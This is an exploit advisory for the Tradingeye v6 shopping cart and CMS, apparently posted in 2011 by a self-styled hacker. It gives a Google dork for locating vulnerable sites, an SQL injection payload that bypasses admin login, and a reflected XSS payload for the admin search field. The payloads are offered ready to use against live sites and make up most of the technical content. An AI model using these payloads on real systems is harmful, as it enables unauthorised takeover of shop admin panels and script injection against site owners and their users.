# Exploit Title: Tradingeye Multiple Vulnerabilities# Vendor:www.tradingeye.com# Date: 12th july,2011# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (
http://www.shadowrootkit.wordpress.com)# Google Dork:Powered by Tradingeye. 2009 Tradingeye v6 demo*****************************************************************************************************************************************************************************************
BREIF DESCRIPTION
*****************************
Tradingeye is a fully-featured web standards compliant Shopping Cart & CMS,
built from the ground up with web accessibility and SEO in mind. Tradingeye
is the
choice of thousands of online retailers who care about accessibility,
usability and most importantly - results.******************************************************************************************************************************************************************************************(Auth ByPass) SQLi Vulnerability
***************************************{DEMO}: http://site.com/adminindex.php
EXPLOIT:
Username: ' or0=0#
Password: ' or0=0#
Observe: Attackers can use Authentication Bypass to get into Admin Panel in
the site.
Reflected XSS Vulnerability
********************************
EXPLOIT 2: Reflected XSS Vulnerability in admin panel(search field){Demo}:
http://site.com/user/adminindex.php?action=user.home
Exploit:">><marquee><h1>XSSed_by_r007k17</h1></marquee>*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14--*****************************************************************************************************************************************************************************************
